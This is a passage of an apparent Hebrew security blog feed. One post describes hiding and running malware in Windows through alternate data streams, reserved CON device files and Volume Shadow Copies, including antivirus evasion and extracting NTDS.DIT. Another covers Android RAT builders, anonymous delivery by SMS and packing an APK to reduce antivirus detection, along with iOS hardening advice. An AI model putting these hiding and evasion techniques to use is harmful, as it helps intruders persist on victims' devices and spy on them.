<div id="attachment_930" style="width: 1034px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_mspaint.png"><img aria-describedby="caption-attachment-930" loading="lazy" class="size-full wp-image-930" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_mspaint.png" alt="MSPaint with ADS" width="1024" height="673" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_mspaint.png 1024w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_mspaint-300x197.png 300w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-930" class="wp-caption-text">mspaint אינו יודע לטפל ב- ADS</p></div>
<p>היופי ש- Windows Explorer אינו מודע לקיומו של ADS ואינו מציג אותו כלל. אם ניצור מספר data streams בקובץ מסוים עם מידע בגודל כלשהו, הסייר של וינדוס יתייחס רק ל- stream הדיפולטי (הראשון), יציג את הגודל שלו כגודל של הקובץ, ויפתח רק אותו בפתיחת הקובץ. רק תאריך שינוי הקובץ יתעדכן, אבל מי בודק תאריך שינוי באמת?</p>
<div id="attachment_932" style="width: 1034px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_size.png"><img aria-describedby="caption-attachment-932" loading="lazy" class="wp-image-932 size-full" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_size.png" alt="גודל של קובץ לא משתנה לפי ADS" width="1024" height="673" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_size.png 1024w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_size-300x197.png 300w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-932" class="wp-caption-text">מוצג רק הגודל של ה- data stream הראשון</p></div>
<p>אדגים כיצד להסתיר ולהריץ קובץ הרצה בתוך ADS של קובץ JPG. השלבים הם:</p>
<ol>
<li>יצירת ADS חדש עם התוכן של קובץ malware.exe בתוך קובץ hello.jpg;</li>
<li>הרצת הקובץ עם הפקודה wmic process call create.</li>
</ol>
<p>הדגל R בפקודה dir מציג ADS.</p>
<div id="attachment_968" style="width: 687px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_create.png"><img aria-describedby="caption-attachment-968" loading="lazy" class="size-full wp-image-968" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_create.png" alt="שתילת קובץ הרצה כ- ADS של קובץ תמונה." width="677" height="517" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_create.png 677w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_create-300x229.png 300w" sizes="(max-width: 677px) 100vw, 677px" /></a><p id="caption-attachment-968" class="wp-caption-text">שתילת קובץ הרצה כ- ADS של קובץ תמונה.</p></div>
<p>הבטחתי להסביר על WMIC, או <strong>Windows Management Instrumentation</strong>. כדי להריץ קובץ, בד&quot;כ אפשר להשתמש בפקודה <strong>start</strong>. אבל מכיוון שהפקודה הזו לא יודעת לעבוד עם ADS, היא פשוט לא תמצא את הקובץ. לעומת זאת, <strong>wmic</strong> כן יודע לטפל ב- ADS, ולכן נשתמש בו.</p>
<div id="attachment_952" style="width: 688px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_run_with_start.png"><img aria-describedby="caption-attachment-952" loading="lazy" class="wp-image-952 size-full" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_run_with_start.png" alt="start נכשלת בהרצת קובץ מתוך ADS" width="678" height="345" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_run_with_start.png 678w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/ads_run_with_start-300x152.png 300w" sizes="(max-width: 678px) 100vw, 678px" /></a><p id="caption-attachment-952" class="wp-caption-text">start נכשלת בהרצת קובץ מתוך ADS</p></div>
<p>יתרונות:</p>
<ul>
<li>מוסתר מפני המשתמש;</li>
<li>קל מאוד למימוש ואינו דורש הרשאות מיוחדות.</li>
</ul>
<p>חסרונות:</p>
<ul>
<li>מי שמחפש – ימצא, במיוחד האנטיוירוסים.</li>
</ul>
<p>מסקנות:</p>
<ul>
<li>משעשע, אך כבר אינו יעיל בהסתרת פוגענים, כי האנטיוירוסים סורקים data streams. יכול להיות שימושי בהסתרת ספריית סרטים אישית.</li>
</ul>
<h2>2. Device files</h2>
<p>נמשיך בספרינט. הידעתם שב- Windows יש קבצים מיוחדים המקושרים לדרייברים מסויימים? כן כן, דומה לתיקיית dev/ במערכות ממשפחת Unix. זה הוא פיצ'ר שהגיע עוד מ- DOS וקיים עד עכשיו, לא ברור מאיזו סיבה. בניגוד למערכות ממשפחת יוניקס, במערכת הפעלה Windows קבצים אלה לא יושבים בתיקיה ייעודית. מדובר במילים שמורות במערכת שאי אפשר ליצור קבצים עם שם דומה על הדיסק בדרכים קונבנציונליות.</p>
<p>לדוגמה, CON מייצג את console, בדומה ל- dev/tty/ במשפחת יוניקס. אפשר לקרוא ולכתוב לקובץ זה דרך STDIN ו- STDOUT. שליחת מחרוזת תגרום להדפסתה על המסך.</p>
<p><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/con_echo.png"><img loading="lazy" class="aligncenter size-full wp-image-937" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/con_echo.png" alt="פלט לתוך CON" width="677" height="343" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/con_echo.png 677w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/con_echo-300x151.png 300w" sizes="(max-width: 677px) 100vw, 677px" /></a>עוד קבצים מיוחדים מהסוג הזה: AUX, NUL, COMx, LPTx.</p>
<p>מה אפשר לעשות עם זה, אתם שואלים? אמנם פיצ'ר זה לא יאפשר להסתיר קבצים זדוניים מהמשתמש, אבל יאפשר לשמר אותם על הדיסק ללא יכולת מחיקה או שינוי בשיטה הרגילה. כל זה תודות למבנה העקום של Windows.</p>
<p>כפי שכתבתי קודם, שמות של קבצים וירטואליים אלה שמורים. אי אפשר ליצור קובץ על הדיסק עם שם כזה. תנסו עכשיו ליצור קובץ בשם CON (שימו לב – ללא extension)&#8230; השיטה ליצירת קבצים אלה היא דרך UNC, וזו גם הדרך למחוק אותם.</p>
<p>העתקת סוס טרויאני לקובץ בשם CON:</p>
<div id="attachment_938" style="width: 687px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/con_malware_create.png"><img aria-describedby="caption-attachment-938" loading="lazy" class="size-full wp-image-938" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/con_malware_create.png" alt="יצרית קובץ CON" width="677" height="343" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/con_malware_create.png 677w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/con_malware_create-300x151.png 300w" sizes="(max-width: 677px) 100vw, 677px" /></a><p id="caption-attachment-938" class="wp-caption-text">אי אפשר למחוק קובץ CON בנתיב רגיל</p></div>
<p>הרצת הקובץ זדוני:</p>
<p><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/con_malware_run.png"><img loading="lazy" class="aligncenter size-full wp-image-939" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/con_malware_run.png" alt="הרצת קובץ CON" width="758" height="495" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/con_malware_run.png 758w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/con_malware_run-300x195.png 300w" sizes="(max-width: 758px) 100vw, 758px" /></a></p>
<p>למחוק את הקובץ המיוחד אפשר באותה הדרך כפי שיצרנו, דרך UNC:</p>
<pre dir="ltr" style="text-align: right;">del \\.\c:\temp\CON</pre>
<p>הפעם שוב היה צורך ב- WMIC, למרות שלא מדובר ב- ADS. וזו הסיבה:</p>
<p><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/con_start.png"><img loading="lazy" class="aligncenter size-full wp-image-940" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/con_start.png" alt="הרצת קובץ CON עם הפקודה start" width="677" height="519" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/con_start.png 677w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/con_start-300x229.png 300w" sizes="(max-width: 677px) 100vw, 677px" /></a> הפקודה start לא מזהה את סוג הקובץ, וזה לא אמור להיות לפי extension, מכיוון שב- ADS ה- extension בכלל לא רלוונטי.</p>
<p>יתרונות:</p>
<ul>
<li>אי אפשר למחוק דרך Windows Explorer או שורת פקודה ללא שימוש ב- UNC;</li>
<li>קל מאוד למימוש ואינו דורש הרשאות מיוחדות.</li>
</ul>
<p>חסרונות:</p>
<ul>
<li>נראה חשוד;</li>
<li>האנטיוירוסים יודעים לטפל בזה.</li>
</ul>
<p>מסקנות:</p>
<ul>
<li>לא יעיל. האנטיוירוסים ניגשים גם דרך UNC ומוחקים את הקובץ. יכול להיות שימושי כדי לעצבן את החברים שלא מבינים במחשבים.</li>
</ul>
<h2>3. Volume Shadow Copy</h2>
<p>נסיים בתרגילי כוח. VSS, או <strong>Volume Shadow Service</strong>, הנו שירות ב- Windows המבצע שמירה של בלוקים על הדיסק להעתק שנקרא VSC, או <strong>Volume Shadow Copy</strong>. זה אותו ההעתק שמופיע באשף שחזור המערכת למצב קודם, או בחירת גרסה קודמת של הקובץ. ה- VSC נמצא במקום שמור על הדיסק, שלא ניתן לראות אותו ב- Windows Explorer ללא יצירת קיצור דרך, אבל אפשר לגשת אליו – ניחשתם נכון – דרך UNC.</p>
<div id="attachment_948" style="width: 687px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_list.png"><img aria-describedby="caption-attachment-948" loading="lazy" class="size-full wp-image-948" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_list.png" alt="דוגמה לשימוש ב- vssadmin" width="677" height="343" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_list.png 677w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_list-300x151.png 300w" sizes="(max-width: 677px) 100vw, 677px" /></a><p id="caption-attachment-948" class="wp-caption-text">הנתיב ל- VSC</p></div>
<p>כדי לעבוד עם VSS נדרשות הרשאות אדמין. לאחר השגת הרשאות אלו על המערכת (עניין שטותי באמת) ושתילה של הקובץ הזדוני, אפשר ליצור VSC ואז למחוק את הקובץ. לאחר מכן, אפשר להריץ אותו ישירות מה- VSC. כך הקובץ לא יישאר בצורה גלויה על הדיסק והאנטיוירוסים לא יגלו אותו, מכיוון שהם לא סורקים VSC. בנוסף, ה- VSC הוא לקריאה בלבד, כך שגם אם תתבצע סריקה, אין דרך למחוק קובץ בודד, אלא רק ע&quot;י מחיקה של כל ה- VSC בו הוא נמצא.</p>
<p>איך אפשר ליצור Volume Shadow Copy? במידה ומדובר בגרסת Windows למחשב אישי ולא לשרתים, אין דרך מהקופסה ליצור VSC משורת הפקודה, אלא רק דרך GUI (אמנם אפשר להציג VSC קיימים עם הפקודה <strong>vssadmin</strong>). אל דאגה, מרק באגט וטים טומס כבר חשבו על זה וכתבו כלי שנקרא <a title="vssown" href="https://ptscripts.googlecode.com/svn-history/r1/trunk/windows/vssown.vbs" target="_blank">vssown</a>. הכלי סה&quot;כ משתמש ב- API של Windows כדי לשלוט על VSS.</p>
<p>כעת, ניצור VSC חדש על כל הכונן C, כך שיכיל גם את הקובץ שנמצא בתיקיה c:\temp.</p>
<div id="attachment_947" style="width: 683px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_create.png"><img aria-describedby="caption-attachment-947" loading="lazy" class="size-full wp-image-947" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_create.png" alt="דוגמה ליצירת Volume Shadow Copy" width="673" height="627" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_create.png 673w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_create-300x279.png 300w" sizes="(max-width: 673px) 100vw, 673px" /></a><p id="caption-attachment-947" class="wp-caption-text">יצירת VSC עם קובץ זדוני</p></div>
<p>כעת אפשר למחוק את הקובץ המקורי ולהריץ את ההעתק שלו ישירות מה- VSC.</p>
<div id="attachment_949" style="width: 770px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_run.png"><img aria-describedby="caption-attachment-949" loading="lazy" class="size-full wp-image-949" src="http://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_run.png" alt="הרצת קובץ מתוך VSC" width="760" height="528" srcset="https://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_run.png 760w, https://www.saltedhash.co.il/wp-content/uploads/2014/05/vss_run-300x208.png 300w" sizes="(max-width: 760px) 100vw, 760px" /></a><p id="caption-attachment-949" class="wp-caption-text">הרצת קובץ מתוך VSC</p></div>
<p>הגיוני שהאנטיוירוס היה אמור לזהות את הקובץ עם real time protection כשהוא מופעל מה- VSC, אבל בבדיקה עם וירוס <a title="eicar" href="http://www.eicar.org/85-0-Download.html" target="_blank">eicar</a>, אנטיוירוס Avira לא זיהה שום דבר.<br />
וכן, גם פה יש צורך להשתמש ב- WMIC, כי הוא יודע לעבוד עם UNC.</p>
<p>יתרונות:</p>
<ul>
<li>מוסתר מפני המשתמש;</li>
<li>מוסתר וחסוי מפני האנטיוירוסים בסריקת הקבצים על הדיסק;</li>
<li>נראה שלא כל האנטיוירוסים מגלים את הקובץ בהגנת זמן אמת כשמופעל ישירות מה- VSC.</li>
</ul>
<p>חסרונות:</p>
<ul>
<li>דורש הרשאות אדמין;</li>
<li>ההעתק נדרס אחרי כמה זמן אם מופעל גיבוי אוטומטי של המערכת.</li>
</ul>
<p>מסקנות:</p>
<ul>
<li>מאוד יעיל בהסתרת הקבצים. שימוש נוסף – הוצאת קבצים מוגנים לקריאה בזמן ריצת המערכת, כמו NTDS.DIT (הבסיס נתונים של Active Directory).</li>
</ul>
<h2>לסיכום</h2>
<p>נראה כי כל שיטה בפני עצמה אינה שימושית נגד האנטיוירוסים. שתי השיטות הראשונות אינן יעילות, והשיטה השלישית דורשת הרשאות אדמין, כך שאם כבר הושגו הרשאות מהסוג הזה, אז גם ככה יש שליטה מלאה על המערכת.</p>
<p>עם זאת, במידה והמטרה היא גנבת מידע, או הסתרת פוגענים עד להודעה חדשה, נראה שיש שימוש בשיטות אלה. במיוחד שאפשר לעשות שילוב ביניהן.</p><p>The post <a href="https://www.saltedhash.co.il/blog/three-ways-to-hide-malware/">שלוש דרכים מתקדמות להסתיר קבצים ב- Windows</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/three-ways-to-hide-malware/feed/</wfw:commentRss>
			<slash:comments>5</slash:comments>
		
		
			</item>
		<item>
		<title>סוס טרויאני אצלכם בסמארטפון</title>
		<link>https://www.saltedhash.co.il/blog/botnet-smartphone/</link>
					<comments>https://www.saltedhash.co.il/blog/botnet-smartphone/#comments</comments>
		
		<dc:creator><![CDATA[עמית כהן]]></dc:creator>
		<pubDate>Thu, 07 Nov 2013 16:54:55 +0000</pubDate>
				<category><![CDATA[פרטיות]]></category>
		<category><![CDATA[rat]]></category>
		<category><![CDATA[בוטנט]]></category>
		<category><![CDATA[סוס טרויאני]]></category>
		<category><![CDATA[פרטיות באינטרנט]]></category>
		<guid isPermaLink="false">http://www.saltedhash.co.il/?p=910</guid>

					<description><![CDATA[<p>עד כמה קל לחדור לנו לסמארטפון? האם קיימים סמארטפונים חסינים לפריצה? האם כדאי לחזור לנוקיה 3210?</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/botnet-smartphone/">סוס טרויאני אצלכם בסמארטפון</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><strong>עד כמה קל לחדור לנו לסמארטפון? האם קיימים סמארטפונים חסינים לפריצה? האם כדאי לחזור לנוקיה 3210?</strong></p>
<p>מערכות ההפעלה של גוגל ואפל, אנדרואיד ו- iOS, שתיהן ממשפחת מערכות UNIX (יותר נכון UNIX-like), שהיא בעלת מערכת הרשאות שנחשבת לבטוחה יותר מזו של Windows. למרות המקורות הדומים, בחרו אפל וגוגל בשתי גישות מנוגדות בפיתוח מערכות ההפעלה שלהן: אפל בחרה עבור ה iPhone במערכת הפעלה סגורה ומקודדת, שמאפשרת הורדת אפליקציות אך ורק מה Appstore, חנות האפליקציות הרשמית של אפל, שם כל אחת מהן נבדקת בקפדנות לפני שהיא מקבלת את האישור הסופי. גוגל בחרה במערכת הפעלה בעלת קוד פתוח, שמשמש לא רק את יצרניות הסמארטפונים, אלא גם אנשים פרטיים בפיתוח של גרסאות שונות שלה.</p>
<p>בפוסט זה נתמקד על שתי מערכות ההפעלה האלה כנפוצות ביותר.</p>
<p>הגישה הליברלית של גוגל בחלוקת הקוד שלה, האפשרות להורדת אפליקציות ממקורות שהם לא ה- Android Market, חנות האפליקציות של גוגל, והאפשרות להעלות באנונימיות אפליקציות חדשות ל- Android Market בלי בדיקות יסודיות – כל אלה אפשרו כבר מספר משמעותי של וירוסים והתקפות בשלוש השנים בהן אנדרואיד קיימת.</p>
<p>יש תוכנות מעקב לפאלפונים שדורשות מגע פיזי עם הפאלפון, או את הסיסמה לחשבון שלכם בגוגל. לדוגמה, תוכנות למציאת המכשיר אם נגנב. אמנם תוכנות אלה לא וירוסים, אך צריך להיזהר אם עוזבים את המכשיר ללא השגחה, כך שמישהו יכול להתקין עליו אחת מהתוכנות הנ”ל. לכן, הקפידו לנעול את המכשיר עם סיסמה.</p>
<p>אך המאמר לא על תוכנות איתור. הכלים הבאים שיוצגו הם רוגלות הפועלות מרחוק ולכן דרך ההתגוננות שונה.</p>
<h2>התקפות כנגד מערכת ההפעלה אנדרואיד</h2>
<p>ראשית יש להזכיר שאת הקובץ הזדוני אפשר לשלוח לקורבן דרך וואטסאפ, SMS וכדומה, ולא בהכרח להעלות לחנות האפליקציות. לא לחינם הזכרתי SMS – חשבתם לשלוח לקורבן את הקובץ מהפאלפון שלכם? טעות&#8230; למה לקחת סיכון אם יש היום אתרים שייתנו לכם לשלוח SMS דרך האינטרנט, ולהיות קצת יותר אנונימי (בין אם זה ע&quot;י TOR או שיטות אחרות לזיוף ה- IP וכתובת ה-MAC).</p>
<p>אתר לדוגמא לשליחת SMS חינם לכל העולם: <a href="http://www.afreesms.com/freesms" target="_blank">http://www.afreesms.com/freesms</a></p>
<p>אם חשבתם שרק <a title="מה זה בוטנט" href="http://www.saltedhash.co.il/blog/what-is-botnet/">למחשבים אישיים יש בוטנטים</a>, אז טעיתם. הנה כמה דוגמאות לבוטנט למכשירים סלולאריים:</p>
<h3>AndroRAT</h3>
<p>כדוגמת &quot;DarkComet&quot; ו- &quot;CyberGate&quot; שהן מערכות RAT למחשב, יצאה גם גרסת קוד פתוח לאנדרואיד. הרעיון הוא אותו הרעיון: שולחים לקורבן את הקובץ (ניתן לשים את הסוס טרויאני כחלק מאפליקציה מסוימת, או כל משחק, ללא מאמץ מרובה ע&quot;י ממשק נוח שנבנה – ראו תמונה). אז מה יכול לעשות התוקף ברגע שפתחתם את הקובץ? כמעט הכול. להפעיל את המצלמה ואת המיקרופון; לגשת לכל המידע על המכשיר, כמו אנשי קשר, תמונות והגדרות; הוא יכול לראות את ה- IEMI (מסוכן מאוד, מכיוון שכך ניתן לחסום את המכשיר).</p>
<h3><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/11/AndroRat_1.png"><img loading="lazy" class="size-full wp-image-911 aligncenter" title="AndroRat Builder" alt="בוטנט לסמארטפון - בנאי סוס טרויאני" src="http://www.saltedhash.co.il/wp-content/uploads/2013/11/AndroRat_1.png" width="338" height="500" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/11/AndroRat_1.png 338w, https://www.saltedhash.co.il/wp-content/uploads/2013/11/AndroRat_1-202x300.png 202w" sizes="(max-width: 338px) 100vw, 338px" /></a></h3>
<div id="attachment_912" style="width: 691px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/11/AndroRat_2.png"><img aria-describedby="caption-attachment-912" loading="lazy" class="size-full wp-image-912" title="AndroRat Server" alt="בוטנט לסמארטפון - פאנל ניהול" src="http://www.saltedhash.co.il/wp-content/uploads/2013/11/AndroRat_2.png" width="681" height="354" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/11/AndroRat_2.png 681w, https://www.saltedhash.co.il/wp-content/uploads/2013/11/AndroRat_2-300x155.png 300w" sizes="(max-width: 681px) 100vw, 681px" /></a><p id="caption-attachment-912" class="wp-caption-text">פאנל ניהול לשרת С&amp;C</p></div>
<h3>RazStealer</h3>
<p>דומה ל- keylogger שאתם מכירים, רק שהפעם זה למערכת אנדרואיד. הממשק של בניית הקובץ נוח מאוד. ע&quot;י סימון כמה משבצות והכנסת אימייל שאליו יישלח המידע הגנוב, אתם פשוט יכולים לגשת למידע הרגיש ביותר של הקורבן ע&quot;י מספר פעולות פשוטות – הקלות הבלתי נסבלת שבה אנשים ללא ידע באבטחת מידע יכולים להפוך לבעלי יכולות גבוהות עם הכלים המתאימים מלחיצה. המערכת הזו קצת פחות הרסנית מהקודמת, כי היא נותנת פחות אופציות, אבל עדיין לא נעים.</p>
<p><img loading="lazy" class="aligncenter size-full wp-image-913" alt="RazStealer" src="http://www.saltedhash.co.il/wp-content/uploads/2013/11/RazStealer.png" width="440" height="376" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/11/RazStealer.png 440w, https://www.saltedhash.co.il/wp-content/uploads/2013/11/RazStealer-300x256.png 300w" sizes="(max-width: 440px) 100vw, 440px" /></p>
<p>רגע ,הכול טוב ויפה כל עוד אין לקורבן אנטי וירוס. אבל מה אם יש לו אנטי וירוס? חשבתם שאם יש לכם אנטי וירוס בפאלפון אתם מאובטחים? תחשבו שוב. עד עכשיו היה החלק של יצירת הרוגלה. עכשיו מגיע החלק של ההצפנה. יש הרבה אתרים ותוכנות להצפנת קבצי APK. רובם מתחת ל&quot;ראדר&quot; עקב השימוש הלא חוקי בעליל שהאקרים או גורמים עוינים עושים בהם, אך ישנם גם לגיטימיים. בכל מקרה, אביא לכם שני מנועי הצפנה. הראשון נפוץ השני קצת פחות.</p>
<ol>
<li><a href="http://www.apkprotect.com" target="_blank">http://www.apkprotect.com</a></li>
<li><a href="http://www.decompilingandroid.com/secure-your-android-app" target="_blank">http://www.decompilingandroid.com/secure-your-android-app</a></li>
</ol>
<p>עבדכם הנאמן בנה וירוס והצפין אותו והנה התוצאות:</p>
<p>לפני ההצפנה:</p>
<p dir="ltr" style="text-align: right;"><a href="https://www.virustotal.com/he/file/9d123a4d84827a60c8b7920aac9d8bfdd0ffec841743544eaf8b9813fcd2c47d/analysis/" target="_blank">https://www.virustotal.com/he/file/9d123a4d84827a60c8b7920aac9d8bfdd0ffec841743544eaf8b9813fcd2c47d/analysis/</a></p>
<p>תוצאה: 4/47</p>
<p>רק 4 זיהו את הקובץ כוירוס. לדעתי האנטי וירוסים של הפאלפונים בשפל המדרגה לעומת המחשב. אבל הנתון הבא יכניס אתכם (ובצדק) ללחץ.</p>
<p>אחרי ההצפנה:</p>
<p dir="ltr" style="text-align: right;"><a href="https://www.virustotal.com/he/file/c7f7c8bb716fea224decdfc286dc70880ae84554507658ffa623a92b5209c8da/analysis/1382045699/" target="_blank">https://www.virustotal.com/he/file/c7f7c8bb716fea224decdfc286dc70880ae84554507658ffa623a92b5209c8da/analysis/1382045699/</a></p>
<p>תוצאה: 2/47</p>
<p>רק 2 אנטי וירוסים (Avast ו- Sophos) זיהו את הקובץ כוירוס. זה אומר, שאם יש לכם אנטי וירוס על הפאלפון הוא לא שווה הרבה ומספיק שהייתה הצפנה נוספת על הקובץ, ספק אם אחד מהאנטי וירוסים היה מתריע.</p>
<h2>דרכי התגוננות באנדרויד</h2>
<p>נוכחנו לדעת שהאנטי וירוסים עדיין לא במיטבם. הם טובים, אבל אם ההאקר באמת נחוש ואתם לא תהיו ערניים הם לא יעמדו בדרכו למטרה.</p>
<p>ההתגוננות היא לא לפתוחSMS מאנשים שאתם לא מכירים. ואם כבר נכנסתם וכתוב שזה אפליקציה חדשה של mako ובאתם להתקין את האפליקצייה, אז קורה הדבר הבא: הדף שאתם תמיד מאשרים הרשאות ולא קוראים צץ. תקראו מה הוא דורש – לא הגיוני ש- mako (לדוגמה) מבקשים הרשאות של גישה למצלמה ול- SMS.</p>
<p>להלן דוגמא של מספר הרשאות בלתי מבוטל:</p>
<p style="text-align: center;"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/11/Android_app_access.png"><img loading="lazy" class="aligncenter size-full wp-image-914" title="Android application access" alt="הרשאות אפליקציה באנדרויד" src="http://www.saltedhash.co.il/wp-content/uploads/2013/11/Android_app_access.png" width="297" height="528" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/11/Android_app_access.png 297w, https://www.saltedhash.co.il/wp-content/uploads/2013/11/Android_app_access-168x300.png 168w" sizes="(max-width: 297px) 100vw, 297px" /></a></p>
<h2>התקפות כנגד מערכת ההפעלה iOS</h2>
<p>גם מכשירי iPhone שמריצים את מערכת ההפעלה iOS אינם חסינים מפגיעה. רבים מהמשתמשים ב- iPhone &quot;פורצים&quot; את ההגנה שלו (Jailbreak) באמצעות כלים אוטומטיים על מנת לאפשר הורדת אפליקציות שלא מה- AppStore. הפריצה מאפשרת גישה מלאה למכשיר, בדומה לגישה הקיימת במרבית הסמאטפונים מבוססי אנדרואיד.</p>
<p>כאשר המערכת iOS לא נפרצת ע&quot;י המשתמש, מעטים הרוגלות שאפשר להריץ עליה.</p>
<p>אבל אם פרצתם את מערכת ה- iOS שלכם, אתם בבעיה. ברגע שתגלשו על WiFi ציבורי, האקר יוכל לגשת לכל המידע על הפאלפון שלכם! יוכל לשלוח ולהעתיק כל קובץ שירצה וזה כולל תוכנות ריגול &quot;חוקיות&quot;.</p>
<p>איך זה מתבצע? אם פרצתם את המכשיר, חשוב מאוד לשנות את סיסמת ברירת המחדל של משתמש root. במהלך הפריצה הסיסמה מאופסת לסיסמת ברירת מחדל &quot;alpine&quot;, והאקרים יכולים להשתלט על מכשיר פרוץ כזה בקלות במהלך שימוש ברשת ציבורית. ע&quot;י קבלת ה- IP של המכשיר שלכם (ניתן לבצע ע&quot;י תוכנה פשוטה Wireless Network Watcher) וע&quot;י השמת השם משתמש והסיסמא של הבירית מחדל ההאקר מבצע את זממו.</p>
<h2>הקשחת משתמש root באייפון</h2>
<p>צריך לשנות את הסיסמת ברירת מחדל. נכתב פוסט ארוך המסביר כיצד בדיוק:</p>
<p><a href="http://www.iphoneil.net/?p=61859" target="_blank">http://www.iphoneil.net/?p=61859</a></p>
<h2>לסיכום</h2>
<p>גוגל ואפל נוקטות שתיהן בגישה של הכחשה כלפי הוירוסים שמגיעים למערכות ההפעלה שלהן, וכך עוברים חודשים ארוכים עד שהן טורחות לשחרר עדכוני אבטחה עבור פרצות שמתגלות במערכות שלהן. לפני כמה חודשים <a href="http://www.mako.co.il/nexter-high-tech/world-apple/Article-8949ec6f7179d31006.htm" target="_blank">פורסם</a> שפרצת אבטחה ב- iTunes, שהכרחית לעבודה עם אייפון ואייפד, אפשרה לרגל אחרי משתמשים, נסגרה רק לאחר 3 שנים.</p>
<p>מיקרוסופט כבר הבינה שמדובר בבעיה אמיתית עם עשרות אלפי וירוסים חדשים מידי חודש שמכוונים כלפי Windows, ובכל חודש משחררת יותר ויותר עדכוני אבטחה, שגם הם לא מספיקים כדי לעצור את שטף הוירוסים.</p>
<p>בשנים הקרובות כשמרבית הוירוסים וההתקפות יעברו לאנדרואיד ו- iOS, ייאלצו גם גוגל ואפל להתמודד עם המציאות החדשה, אולם כבר הוכח שלא ניתן בכלים הנוכחיים לסגור את כל הפרצות העתידיות.</p><p>The post <a href="https://www.saltedhash.co.il/blog/botnet-smartphone/">סוס טרויאני אצלכם בסמארטפון</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/botnet-smartphone/feed/</wfw:commentRss>
			<slash:comments>3</slash:comments>
		
		
			</item>
		<item>
		<title>גניבת חשבונות for dummies</title>
		<link>https://www.saltedhash.co.il/blog/stealing-accounts-for-dummies/</link>
					<comments>https://www.saltedhash.co.il/blog/stealing-accounts-for-dummies/#comments</comments>
		
		<dc:creator><![CDATA[עמית כהן]]></dc:creator>
		<pubDate>Sat, 26 Oct 2013 19:44:29 +0000</pubDate>
				<category><![CDATA[פרטיות]]></category>
		<category><![CDATA[גניבת סיסמאות]]></category>
		<category><![CDATA[הזדהות חלשה]]></category>
		<category><![CDATA[פייסבוק]]></category>
		<category><![CDATA[תקיפת הזדהות]]></category>
		<guid isPermaLink="false">http://www.saltedhash.co.il/?p=891</guid>

					<description><![CDATA[<p>הרשת מלאה בתוכנות פריצה לפייסבוק, הבטחות ל- 100% פריצה ופיצוח הקוד או הסיסמה לפרופיל מושמעות בכל פורום, למזלנו ישנם תוכנות בודדות (מאוד!) שבאמת עובדות. מעבר לזה, רובם מכילות וירוסים כדי להפיל "פורצים" חובבניים. רוב התוכנות, גם במידה והן עובדות, מוצאות את דרכם לג'אנק האינטרנט מהר מאוד, הפייסבוק עולה על חור האבטחה ומנטרל אותו תוך מספר ימים מזמן הגילוי שלו.</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/stealing-accounts-for-dummies/">גניבת חשבונות for dummies</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<blockquote>
